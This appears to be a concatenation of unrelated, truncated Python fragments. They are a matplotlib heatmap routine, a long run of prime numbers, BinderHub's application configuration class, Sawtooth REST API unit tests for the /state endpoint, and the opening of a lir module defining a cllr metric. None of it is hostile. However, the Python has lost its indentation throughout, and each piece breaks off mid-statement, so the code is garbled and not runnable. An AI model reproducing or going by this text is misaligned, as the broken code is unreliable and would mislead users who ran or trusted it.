[[res[i1, iens]/res[i2, iens] for i1 in range(num_methods)]
for i2 in range(num_methods)]
)
ax.set_position(figpos)
# White Rectangles
for ipm in range(num_methods):
for jpm in range(num_methods):
# Diagonal black
if ipm == jpm:
quots[ipm, jpm] = 0.0
# Upper triangle white
if ipm < jpm:
quots[ipm, jpm] = None
ax.imshow(
quots,
interpolation='nearest',
cmap='Greys_r',
norm=colors.Normalize(vmin=0.8, vmax=1.0, clip=False)
)
# Plot: Mostly ticks
ax.set_xticks([i for i in range(num_methods)])
ax.set_xticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize,
rotation=90)
ax.set_yticks([i for i in range(num_methods)])
ax.set_yticklabels([pa.names_methods[which_methods[i]]
for i in range(len(which_methods))],
fontsize=ticksize)
ax.tick_params(length=0)
ax.set_frame_on(False)
# Text
for itext in range(num_methods):
for jtext in range(num_methods):
if itext < jtext:
ntext = quots[jtext, itext]
ttext = str(ntext)[0:4]
px = itext-0.35
py = jtext+0.15
colero = 'white' if ntext < 0.9 else 'black'
ax.text(px, py, ttext, color=colero, fontsize=25)
| |
905299, 905329, 905339, 905347, 905381,
905413, 905449, 905453, 905461, 905477, 905491, 905497, 905507,
905551, 905581, 905587, 905599, 905617, 905621, 905629, 905647,
905651, 905659, 905677, 905683, 905687, 905693, 905701, 905713,
905719, 905759, 905761, 905767, 905783, 905803, 905819, 905833,
905843, 905897, 905909, 905917, 905923, 905951, 905959, 905963,
905999, 906007, 906011, 906013, 906023, 906029, 906043, 906089,
906107, 906119, 906121, 906133, 906179, 906187, 906197, 906203,
906211, 906229, 906233, 906259, 906263, 906289, 906293, 906313,
906317, 906329, 906331, 906343, 906349, 906371, 906377, 906383,
906391, 906403, 906421, 906427, 906431, 906461, 906473, 906481,
906487, 906497, 906517, 906523, 906539, 906541, 906557, 906589,
906601, 906613, 906617, 906641, 906649, 906673, 906679, 906691,
906701, 906707, 906713, 906727, 906749, 906751, 906757, 906767,
906779, 906793, 906809, 906817, 906823, 906839, 906847, 906869,
906881, 906901, 906911, 906923, 906929, 906931, 906943, 906949,
906973, 907019, 907021, 907031, 907063, 907073, 907099, 907111,
907133, 907139, 907141, 907163, 907169, 907183, 907199, 907211,
907213, 907217, 907223, 907229, 907237, 907259, 907267, 907279,
907297, 907301, 907321, 907331, 907363, 907367, 907369, 907391,
907393, 907397, 907399, 907427, 907433, 907447, 907457, 907469,
907471, 907481, 907493, 907507, 907513, 907549, 907561, 907567,
907583, 907589, 907637, 907651, 907657, 907663, 907667, 907691,
907693, 907703, 907717, 907723, 907727, 907733, 907757, 907759,
907793, 907807, 907811, 907813, 907831, 907843, 907849, 907871,
907891, 907909, 907913, 907927, 907957, 907967, 907969, 907997,
907999, 908003, 908041, 908053, 908057, 908071, 908081, 908101,
908113, 908129, 908137, 908153, 908179, 908183, 908197, 908213,
908221, 908233, 908249, 908287, 908317, 908321, 908353, 908359,
908363, 908377, 908381, 908417, 908419, 908441, 908449, 908459,
908471, 908489, 908491, 908503, 908513, 908521, 908527, 908533,
908539, 908543, 908549, 908573, 908581, 908591, 908597, 908603,
908617, 908623, 908627, 908653, 908669, 908671, 908711, 908723,
908731, 908741, 908749, 908759, 908771, 908797, 908807, 908813,
908819, 908821, 908849, 908851, 908857, 908861, 908863, 908879,
908881, 908893, 908909, 908911, 908927, 908953, 908959, 908993,
909019, 909023, 909031, 909037, 909043, 909047, 909061, 909071,
909089, 909091, 909107, 909113, 909119, 909133, 909151, 909173,
909203, 909217, 909239, 909241, 909247, 909253, 909281, 909287,
909289, 909299, 909301, 909317, 909319, 909329, 909331, 909341,
909343, 909371, 909379, 909383, 909401, 909409, 909437, 909451,
909457, 909463, 909481, 909521, 909529, 909539, 909541, 909547,
909577, 909599, 909611, 909613, 909631, 909637, 909679, 909683,
909691, 909697, 909731, 909737, 909743, 909761, 909767, 909773,
909787, 909791, 909803, 909809, 909829, 909833, 909859, 909863,
909877, 909889, 909899, 909901, 909907, 909911, 909917, 909971,
909973, 909977, 910003, 910031, 910051, 910069, 910093, 910097,
910099, 910103, 910109, 910121, 910127, 910139, 910141, 910171,
910177, 910199, 910201, 910207, 910213, 910219, 910229, 910277,
910279, 910307, 910361, 910369, 910421, 910447, 910451, 910453,
910457, 910471, 910519, 910523, 910561, 910577, 910583, 910603,
910619, 910621, 910627, 910631, 910643, 910661, 910691, 910709,
910711, 910747, 910751, 910771, 910781, 910787, 910799, 910807,
910817, 910849, 910853, 910883, 910909, 910939, 910957, 910981,
911003, 911011, 911023, 911033, 911039, 911063, 911077, 911087,
911089, 911101, 911111, 911129, 911147, 911159, 911161, 911167,
911171, 911173, 911179, 911201, 911219, 911227, 911231, 911233,
911249, 911269, 911291, 911293, 911303, 911311, 911321, 911327,
911341, 911357, 911359, 911363, 911371, 911413, 911419, 911437,
911453, 911459, 911503, 911507, 911527, 911549, 911593, 911597,
911621, 911633, 911657, 911663, 911671, 911681, 911683, 911689,
911707, 911719, 911723, 911737, 911749, 911773, 911777, 911783,
911819, 911831, 911837, 911839, 911851, 911861, 911873, 911879,
911893, 911899, 911903, 911917, 911947, 911951, 911957, 911959,
911969, 912007, 912031, 912047, 912049, 912053, 912061, 912083,
912089, 912103, 912167, 912173, 912187, 912193, 912211, 912217,
912227, 912239, 912251, 912269, 912287, 912337, 912343, 912349,
912367, 912391, 912397, 912403, 912409, 912413, 912449, 912451,
912463, 912467, 912469, 912481, 912487, 912491, 912497, 912511,
912521, 912523, 912533, 912539, 912559, 912581, 912631, 912647,
912649, 912727, 912763, 912773, 912797, 912799, 912809, 912823,
912829, 912839, 912851, 912853, 912859, 912869, 912871, 912911,
912929, 912941, 912953, 912959, 912971, 912973, 912979, 912991,
913013, 913027, 913037, 913039, 913063, 913067, 913103, 913139,
913151, 913177, 913183, 913217, 913247, 913259, 913279, 913309,
913321, 913327, 913331, 913337, 913373, 913397, 913417, 913421,
913433, 913441, 913447, 913457, 913483, 913487, 913513, 913571,
913573, 913579, 913589, 913637, 913639, 913687, 913709, 913723,
913739, 913753, 913771, 913799, 913811, 913853, 913873, 913889,
913907, 913921, 913933, 913943, 913981, 913999, 914021, 914027,
914041, 914047, 914117, 914131, 914161, 914189, 914191, 914213,
914219, 914237, 914239, 914257, 914269, 914279, 914293, 914321,
914327, 914339, 914351, 914357, 914359, 914363, 914369, 914371,
914429, 914443, 914449, 914461, 914467, 914477, 914491, 914513,
914519, 914521, 914533, 914561, 914569, 914579, 914581, 914591,
914597, 914609, 914611, 914629, 914647, 914657, 914701, 914713,
914723, 914731, 914737, 914777, 914783, 914789, 914791, 914801,
914813, 914819, 914827, 914843, 914857, 914861, 914867, 914873,
914887, 914891, 914897, 914941, 914951, 914971, 914981, 915007,
915017, 915029, 915041, 915049, 915053, 915067, 915071, 915113,
915139, 915143, 915157, 915181, 915191, 915197, 915199, 915203,
915221, 915223, 915247, 915251, 915253, 915259, 915283, 915301,
915311, 915353, 915367, 915379, 915391, 915437, 915451, 915479,
915487, 915527, 915533, 915539, 915547, 915557, 915587, 915589,
915601, 915611, 915613, 915623, 915631, 915641, 915659, 915683,
915697, 915703, 915727, 915731, 915737, 915757, 915763, 915769,
915799, 915839, 915851, 915869, 915881, 915911, 915917, 915919,
915947, 915949, 915961, 915973, 915991, 916031, 916033, 916049,
916057, 916061, 916073, 916099, 916103, 916109, 916121, 916127,
916129, 916141, 916169, 916177, 916183, 916187, 916189, 916213,
916217, 916219, 916259, 916261, 916273, 916291, 916319, 916337,
916339, 916361, 916367, 916387, 916411, 916417, 916441, 916451,
916457, 916463, 916469, 916471, 916477, 916501, 916507, 916511,
916537, 916561, 916571, 916583, 916613, 916621, 916633, 916649,
916651, 916679, 916703, 916733, 916771, 916781, 916787, 916831,
916837, 916841, 916859, 916871, 916879, 916907, 916913, 916931,
916933, 916939, 916961, 916973, 916999, 917003, 917039, 917041,
917051, 917053, 917083, 917089, 917093, 917101, 917113, 917117,
917123, 917141, 917153, 917159, 917173, 917179, 917209, 917219,
917227, 917237, 917239, 917243, 917251, 917281, 917291, 917317,
917327, 917333, 917353, 917363, 917381, 917407, 917443, 917459,
917461, 917471, 917503, 917513, 917519, 917549, 917557, 917573,
917591, 917593, 917611, 917617, 917629, 917633, 917641, 917659,
917669, 917687, 917689, 917713, 917729, 917737, 917753, 917759,
917767, 917771, 917773, 917783, 917789, 917803, 917809, 917827,
917831, 917837, 917843, 917849, 917869, 917887, 917893, 917923,
917927, 917951, 917971, 917993, 918011, 918019, 918041, 918067,
918079, 918089, 918103, 918109, 918131, 918139, 918143, 918149,
918157, 918161, 918173, 918193, 918199, 918209, 918223, 918257,
918259, 918263, 918283, 918301, 918319, 918329, 918341, 918347,
918353, 918361, 918371, 918389, 918397, 918431, 918433, 918439,
918443, 918469, 918481, 918497, 918529, 918539, 918563, 918581,
918583, 918587, 918613, 918641, 918647, 918653, 918677, 918679,
918683, 918733, 918737, 918751, 918763, 918767, 918779, 918787,
918793, 918823, 918829, 918839, 918857, 918877, 918889, 918899,
918913, 918943, 918947, 918949, 918959, 918971, 918989, 919013,
919019, 919021, 919031, 919033, 919063, 919067, 919081, 919109,
919111, 919129, 919147, 919153, 919169, 919183, 919189, 919223,
919229, 919231, 919249, 919253, 919267, 919301, 919313, 919319,
919337, 919349, 919351, 919381, 919393, 919409, 919417, 919421,
919423, 919427, 919447, 919511, 919519, 919531, 919559, 919571,
919591, 919613, 919621, 919631, 919679, 919691, 919693, 919703,
919729, 919757, 919759, 919769, 919781, 919799, 919811, 919817,
919823, 919859, 919871, 919883, 919901, 919903, 919913, 919927,
919937, 919939, 919949, 919951, 919969, 919979, 920011, 920021,
920039, 920053, 920107, 920123, 920137, 920147, 920149, 920167,
920197, 920201, 920203, 920209, 920219, 920233, 920263, 920267,
920273, 920279, 920281, 920291, 920323, 920333, 920357, 920371,
920377, 920393, 920399, 920407, 920411, 920419, 920441, 920443,
920467, 920473, 920477, 920497, 920509, 920519, 920539, 920561,
920609, 920641, 920651, 920653, 920677, 920687, 920701, 920707,
920729, 920741, 920743, 920753, 920761, 920783, 920789, 920791,
920807, 920827, 920833, 920849, 920863, 920869, 920891, 920921,
920947, 920951, 920957, 920963, 920971, 920999, 921001, 921007,
921013, 921029, 921031, 921073, 921079, 921091, 921121, 921133,
921143, 921149, 921157, 921169, 921191, 921197, 921199, 921203,
921223, 921233, 921241, 921257, 921259, 921287, 921293, 921331,
921353, 921373, 921379, 921407, 921409, 921457, 921463, 921467,
921491, 921497, 921499, 921517, 921523, 921563, 921581, 921589,
921601, 921611, 921629, 921637, 921643, 921647, 921667, 921677,
921703, 921733, 921737, 921743, 921749, 921751, 921761, 921779,
921787, 921821, 921839, 921841, 921871, 921887, 921889, 921901,
921911, 921913, 921919, 921931, 921959, 921989, 922021, 922027,
922037, 922039, 922043, 922057, 922067, 922069, 922073, 922079,
922081, 922087, 922099, 922123, 922169, 922211, 922217, 922223,
922237, 922247, 922261, 922283, 922289, 922291, 922303, 922309,
922321, 922331, 922333, 922351, 922357, 922367, 922391, 922423,
922451, 922457, 922463, 922487, 922489, 922499, 922511, 922513,
922517, 922531, 922549, 922561, 922601, 922613, 922619, 922627,
922631, 922637, 922639, 922643, 922667, 922679, 922681, 922699,
922717, 922729, 922739, | |
<reponame>willingc/binderhub
"""
The binderhub application
"""
import asyncio
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import re
import json
from glob import glob
from urllib.parse import urlparse
import kubernetes.client
import kubernetes.config
from jinja2 import Environment, FileSystemLoader, PrefixLoader, ChoiceLoader
from tornado.httpclient import AsyncHTTPClient
from tornado.httpserver import HTTPServer
import tornado.ioloop
import tornado.options
import tornado.log
from tornado.log import app_log
import tornado.web
from traitlets import Unicode, Integer, Bool, Dict, validate, TraitError, default
from traitlets.config import Application
from jupyterhub.services.auth import HubOAuthCallbackHandler
from .base import Custom404
from .build import Build
from .builder import BuildHandler
from .launcher import Launcher
from .registry import DockerRegistry
from .main import MainHandler, ParameterizedMainHandler, LegacyRedirectHandler
from .repoproviders import GitHubRepoProvider, GitRepoProvider, GitLabRepoProvider, GistRepoProvider
from .metrics import MetricsHandler
from .utils import ByteSpecification, url_path_join
from .events import EventLog
HERE = os.path.dirname(os.path.abspath(__file__))
class BinderHub(Application):
"""An Application for starting a builder."""
@default('log_level')
def _log_level(self):
return logging.INFO
aliases = {
'log-level': 'Application.log_level',
'f': 'BinderHub.config_file',
'config': 'BinderHub.config_file',
'port': 'BinderHub.port',
}
flags = {
'debug': (
{'BinderHub': {'debug': True}},
"Enable debug HTTP serving & debug logging"
)
}
config_file = Unicode(
'binderhub_config.py',
help="""
Config file to load.
If a relative path is provided, it is taken relative to current directory
""",
config=True
)
google_analytics_code = Unicode(
None,
allow_none=True,
help="""
The Google Analytics code to use on the main page.
Note that we'll respect Do Not Track settings, despite the fact that GA does not.
We will not load the GA scripts on browsers with DNT enabled.
""",
config=True
)
google_analytics_domain = Unicode(
'auto',
help="""
The Google Analytics domain to use on the main page.
By default this is set to 'auto', which sets it up for current domain and all
subdomains. This can be set to a more restrictive domain here for better privacy
""",
config=True
)
extra_footer_scripts = Dict(
{},
help="""
Extra bits of JavaScript that should be loaded in footer of each page.
Only the values are set up as scripts. Keys are used only
for sorting.
Omit the <script> tag. This should be primarily used for
analytics code.
""",
config=True
)
base_url = Unicode(
'/',
help="The base URL of the entire application",
config=True)
@validate('base_url')
def _valid_base_url(self, proposal):
if not proposal.value.startswith('/'):
proposal.value = '/' + proposal.value
if not proposal.value.endswith('/'):
proposal.value = proposal.value + '/'
return proposal.value
auth_enabled = Bool(
False,
help="""If JupyterHub authentication enabled,
require user to login (don't create temporary users during launch) and
start the new server for the logged in user.""",
config=True)
use_named_servers = Bool(
False,
help="Use named servers when authentication is enabled.",
config=True)
port = Integer(
8585,
help="""
Port for the builder to listen on.
""",
config=True
)
appendix = Unicode(
help="""
Appendix to pass to repo2docker
A multi-line string of Docker directives to run.
Since the build context cannot be affected,
ADD will typically not be useful.
This should be a Python string template.
It will be formatted with at least the following names available:
- binder_url: the shareable URL for the current image
(e.g. for sharing links to the current Binder)
- repo_url: the repository URL used to build the image
""",
config=True,
)
use_registry = Bool(
True,
help="""
Set to true to push images to a registry & check for images in registry.
Set to false to use only local docker images. Useful when running
in a single node.
""",
config=True
)
per_repo_quota = Integer(
0,
help="""
Maximum number of concurrent users running from a given repo.
Limits the amount of Binder that can be consumed by a single repo.
0 (default) means no quotas.
""",
config=True,
)
log_tail_lines = Integer(
100,
help="""
Limit number of log lines to show when connecting to an already running build.
""",
config=True,
)
push_secret = Unicode(
'binder-push-secret',
allow_none=True,
help="""
A kubernetes secret object that provides credentials for pushing built images.
""",
config=True
)
image_prefix = Unicode(
"",
help="""
Prefix for all built docker images.
If you are pushing to gcr.io, this would start with:
gcr.io/<your-project-name>/
Set according to whatever registry you are pushing to.
Defaults to "", which is probably not what you want :)
""",
config=True
)
build_memory_limit = ByteSpecification(
0,
help="""
Max amount of memory allocated for each image build process.
0 sets no limit.
This is used as both the memory limit & request for the pod
that is spawned to do the building, even though the pod itself
will not be using that much memory since the docker building is
happening outside the pod. However, it makes kubernetes aware of
the resources being used, and lets it schedule more intelligently.
""",
config=True
)
debug = Bool(
False,
help="""
Turn on debugging.
""",
config=True
)
build_docker_host = Unicode(
"/var/run/docker.sock",
config=True,
help="""
The docker URL repo2docker should use to build the images.
Currently, only paths are supported, and they are expected to be available on
all the hosts.
"""
)
@validate('build_docker_host')
def docker_build_host_validate(self, proposal):
parts = urlparse(proposal.value)
if parts.scheme != 'unix' or parts.netloc != '':
raise TraitError("Only unix domain sockets on same node are supported for build_docker_host")
return proposal.value
hub_api_token = Unicode(
help="""API token for talking to the JupyterHub API""",
config=True,
)
@default('hub_api_token')
def _default_hub_token(self):
return os.environ.get('JUPYTERHUB_API_TOKEN', '')
hub_url = Unicode(
help="""
The base URL of the JupyterHub instance where users will run.
e.g. https://hub.mybinder.org/
""",
config=True,
)
@validate('hub_url')
def _add_slash(self, proposal):
"""trait validator to ensure hub_url ends with a trailing slash"""
if proposal.value is not None and not proposal.value.endswith('/'):
return proposal.value + '/'
return proposal.value
build_namespace = Unicode(
'default',
help="""
Kubernetes namespace to spawn build pods in.
Note that the push_secret must refer to a secret in this namespace.
""",
config=True
)
build_image = Unicode(
'jupyter/repo2docker:2ebc87b',
help="""
The repo2docker image to be used for doing builds
""",
config=True
)
build_node_selector = Dict(
{},
config=True,
help="""
Select the node where build pod runs on.
"""
)
repo_providers = Dict(
{
'gh': GitHubRepoProvider,
'gist': GistRepoProvider,
'git': GitRepoProvider,
'gl': GitLabRepoProvider,
},
config=True,
help="""
List of Repo Providers to register and try
"""
)
concurrent_build_limit = Integer(
32,
config=True,
help="""The number of concurrent builds to allow."""
)
executor_threads = Integer(
5,
config=True,
help="""The number of threads to use for blocking calls
Should generaly be a small number because we don't
care about high concurrency here, just not blocking the webserver.
This executor is not used for long-running tasks (e.g. builds).
""",
)
build_cleanup_interval = Integer(
60,
config=True,
help="""Interval (in seconds) for how often stopped build pods will be deleted."""
)
build_max_age = Integer(
3600 * 4,
config=True,
help="""Maximum age of builds
Builds that are still running longer than this
will be killed.
"""
)
# FIXME: Come up with a better name for it?
builder_required = Bool(
True,
config=True,
help="""
If binderhub should try to continue to run without a working build infrastructure.
Build infrastructure is kubernetes cluster + docker. This is useful for pure HTML/CSS/JS local development.
"""
)
tornado_settings = Dict(
config=True,
help="""
additional settings to pass through to tornado.
can include things like additional headers, etc.
"""
)
template_variables = Dict(
config=True,
help="Extra variables to supply to jinja templates when rendering.",
)
template_path = Unicode(
help="Path to search for custom jinja templates, before using the default templates.",
config=True,
)
@default('template_path')
def _template_path_default(self):
return os.path.join(HERE, 'templates')
extra_static_path = Unicode(
help='Path to search for extra static files.',
config=True,
)
extra_static_url_prefix = Unicode(
'extra_static/',
help='Url prefix to serve extra static files.',
config=True,
)
@staticmethod
def add_url_prefix(prefix, handlers):
"""add a url prefix to handlers"""
for i, tup in enumerate(handlers):
lis = list(tup)
lis[0] = url_path_join(prefix, tup[0])
handlers[i] = tuple(lis)
return handlers
def init_pycurl(self):
try:
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
except ImportError as e:
self.log.debug("Could not load pycurl: %s\npycurl is recommended if you have a large number of users.", e)
# set max verbosity of curl_httpclient at INFO
# because debug-logging from curl_httpclient
# includes every full request and response
if self.log_level < logging.INFO:
curl_log = logging.getLogger('tornado.curl_httpclient')
curl_log.setLevel(logging.INFO)
def initialize(self, *args, **kwargs):
"""Load configuration settings."""
super().initialize(*args, **kwargs)
self.load_config_file(self.config_file)
# hook up tornado logging
if self.debug:
self.log_level = logging.DEBUG
tornado.options.options.logging = logging.getLevelName(self.log_level)
tornado.log.enable_pretty_logging()
self.log = tornado.log.app_log
self.init_pycurl()
# initialize kubernetes config
if self.builder_required:
try:
kubernetes.config.load_incluster_config()
| |
<filename>rest_api/tests/unit/test_state_requests.py
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
from base64 import b64decode
from aiohttp.test_utils import unittest_run_loop
from components import Mocks, BaseApiTest
from sawtooth_rest_api.protobuf.validator_pb2 import Message
from sawtooth_rest_api.protobuf import client_state_pb2
from sawtooth_rest_api.protobuf import client_block_pb2
from sawtooth_rest_api.protobuf import block_pb2
ID_A = 'a' * 128
ID_B = 'b' * 128
ID_C = 'c' * 128
ID_D = 'd' * 128
DEFAULT_LIMIT = 100
class StateListTests(BaseApiTest):
async def get_application(self):
self.set_status_and_connection(
Message.CLIENT_STATE_LIST_REQUEST,
client_state_pb2.ClientStateListRequest,
client_state_pb2.ClientStateListResponse)
handlers = self.build_handlers(self.loop, self.connection)
return self.build_app(self.loop, '/state', handlers.list_state)
@unittest_run_loop
async def test_state_list(self):
"""Verifies a GET /state without parameters works properly.
It will receive a Protobuf response with:
- a state root of ID_C
- a paging response with start of "a" and a limit of 100
- three entries with addresses/data of:
* 'a': b'3'
* 'b': b'5'
* 'c': b'7'
It should send a Protobuf request with:
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
/state?head={}&start=a&limit=100'.format(ID_C)
- a paging property that matches the paging response
- a data property that is a list of 3 leaf dicts
- three entries that match those in Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'3', b=b'5', c=b'7')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state')
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response, '/state?head={}&start=a&limit=100'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 3)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_validator_error(self):
"""Verifies a GET /state with a validator error breaks properly.
It will receive a Protobuf response with:
- a status of INTERNAL_ERROR
It should send back a JSON response with:
- a status of 500
- an error property with a code of 10
"""
self.connection.preset_response(self.status.INTERNAL_ERROR)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state', 500)
self.assert_has_valid_error(response, 10)
@unittest_run_loop
async def test_state_list_with_no_genesis(self):
"""Verifies a GET /state with validator not ready breaks properly.
It will receive a Protobuf response with:
- a status of NOT_READY
It should send back a JSON response with:
- a status of 503
- an error property with a code of 15
"""
self.connection.preset_response(self.status.NOT_READY)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state', 503)
self.assert_has_valid_error(response, 15)
@unittest_run_loop
async def test_state_list_with_head(self):
"""Verifies a GET /state works properly with head specified.
It will receive a Protobuf response with:
- a head id of ID_B
- a paging response with start of a and limit of 100
- two entries with addresses/data of:
* 'a': b'2'
* 'b': b'4'
It should send a Protobuf request with:
- a head_id property of ID_B
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_B
- a link property that ends in
'/state?head={}&start=a&limit=100'.format(ID_B)
- a paging property that matches the paging response
- a data property that is a list of 2 leaf dicts
- three entries that match those in Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'2', b=b'4')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_B,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?head={}'.format(ID_B))
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_B)
self.assert_has_valid_link(
response, '/state?head={}&start=a&limit=100'.format(ID_B))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 2)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_bad_head(self):
"""Verifies a GET /state breaks properly with a bad head specified.
It will receive a Protobuf response with:
- a status of NO_ROOT
It should send back a JSON response with:
- a response status of 404
- an error property with a code of 50
"""
self.connection.preset_response(self.status.NO_ROOT)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block())
response = await self.get_assert_status('/state?head={}'.format(ID_D),
404)
self.assert_has_valid_error(response, 50)
@unittest_run_loop
async def test_state_list_with_address(self):
"""Verifies a GET /state works properly filtered by address.
It will receive a Protobuf response with:
- a head id of ID_C
- an empty paging response
- one leaf with addresses/data of: 'c': b'7'
It should send a Protobuf request with:
- an address property of 'c'
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
'/state?head={}&start=c&limit=100&address=c'.format(ID_C)
- a paging property that matches the paging response
- a data property that is a list of 1 leaf dict
- one leaf that matches the Protobuf response
"""
paging = Mocks.make_paging_response("", "c", DEFAULT_LIMIT)
entries = Mocks.make_entries(c=b'7')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?address=c')
controls = Mocks.make_paging_controls()
self.connection.assert_valid_request_sent(
state_root='beef', address='c', paging=controls)
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response,
'/state?head={}&start=c&limit=100&address=c'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_bad_address(self):
"""Verifies a GET /state breaks properly filtered by a bad address.
It will receive a Protobuf response with:
- a status of NO_RESOURCE
- a head id of ID_C
It should send back a JSON response with:
- a response status of 200
- a head property of ID_C
- a link property that ends in
'/state?head={}&start=c&limit=100address=bad'.format(ID_C)
- a paging property with only a total_count of 0
- a data property that is an empty list
"""
paging = Mocks.make_paging_response("", "c", DEFAULT_LIMIT)
self.connection.preset_response(
self.status.NO_RESOURCE,
state_root='beef',
paging=paging)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_C,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?address=bad')
self.assert_has_valid_head(response, ID_C)
self.assert_has_valid_link(
response,
'/state?head={}&start=c&limit=100&address=bad'.format(ID_C))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 0)
@unittest_run_loop
async def test_state_list_with_head_and_address(self):
"""Verifies GET /state works with a head and filtered by address.
It will receive a Protobuf response with:
- a head id of ID_B
- a paging response with a start of a and a limit of 100
- one leaf with addresses/data of: 'a': b'2'
It should send a Protobuf request with:
- a head_id property of ID_B
- an address property of 'a'
- empty paging controls
It should send back a JSON response with:
- a response status of 200
- a head property of ID_B
- a link property that ends in
'/state?head={}&start=a&limit=100&address=a'.format(ID_B)
- a paging property that matches the paging response
- a data property that is a list of 1 leaf dict
- one leaf that matches the Protobuf response
"""
paging = Mocks.make_paging_response("", "a", DEFAULT_LIMIT)
entries = Mocks.make_entries(a=b'2')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_B,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200(
'/state?address=a&head={}'.format(ID_B))
self.connection.assert_valid_request_sent(
state_root='beef',
address='a',
paging=Mocks.make_paging_controls())
self.assert_has_valid_head(response, ID_B)
self.assert_has_valid_link(
response,
'/state?head={}&start=a&limit=100&address=a'.format(ID_B))
self.assert_has_valid_paging(response, paging)
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_paginated(self):
"""Verifies GET /state paginated by works properly.
It will receive a Protobuf response with:
- a head id of ID_D
- a paging response with a start of 2
- one leaf of {'c': b'3'}
It should send a Protobuf request with:
- a paging controls with a limit of 1, and a start of 1
It should send back a JSON response with:
- a response status of 200
- a head property of ID_D
- a link property that ends in
'/state?head={}&start=c&limit=1'.format(ID_D)
- paging that matches the response, with next and previous links
- a data property that is a list of 1 dict
- and that dict is a leaf that matches the one received
"""
paging = Mocks.make_paging_response("b", "c", 1)
entries = Mocks.make_entries(c=b'3')
self.connection.preset_response(state_root='beef', paging=paging,
entries=entries)
self.connection.preset_response(
proto=client_block_pb2.ClientBlockGetResponse,
block=block_pb2.Block(
header_signature=ID_D,
header=block_pb2.BlockHeader(
state_root_hash='beef').SerializeToString()))
response = await self.get_assert_200('/state?start=c&limit=1')
controls = Mocks.make_paging_controls(1, start="c")
self.connection.assert_valid_request_sent(
state_root='beef', paging=controls)
self.assert_has_valid_head(response, ID_D)
self.assert_has_valid_link(
response, '/state?head={}&start=c&limit=1'.format(ID_D))
self.assert_has_valid_paging(
response, paging, '/state?head={}&start=b&limit=1'.format(ID_D))
self.assert_has_valid_data_list(response, 1)
self.assert_entries_match(entries, response['data'])
@unittest_run_loop
async def test_state_list_with_zero_limit(self):
"""Verifies a GET /state with a limit of zero breaks properly.
It should send back a JSON response with:
- a response status of 400
- an error property with a code | |
<reponame>HolmesNL/lir
import collections
import warnings
import numpy as np
from .calibration import IsotonicCalibrator
from .util import Xn_to_Xy, Xy_to_Xn, to_probability, LR
LrStats = collections.namedtuple('LrStats',
['avg_log2lr', 'avg_log2lr_class0', 'avg_log2lr_class1', 'avg_p0_class0', 'avg_p1_class0',
'avg_p0_class1', 'avg_p1_class1', 'cllr_class0', 'cllr_class1', 'cllr', 'lr_class0',
'lr_class1', 'cllr_min', 'cllr_cal'])
def cllr(lrs, y, weights=(1, 1)):
"""
Calculates a log likelihood ratio cost (C_llr) for a series of likelihood
ratios.
<NAME> and <NAME>, Application-independent evaluation of speaker detection, In: Computer Speech and
Language 20(2-3), 2006.
Parameters
----------
lrs : a numpy array of LRs
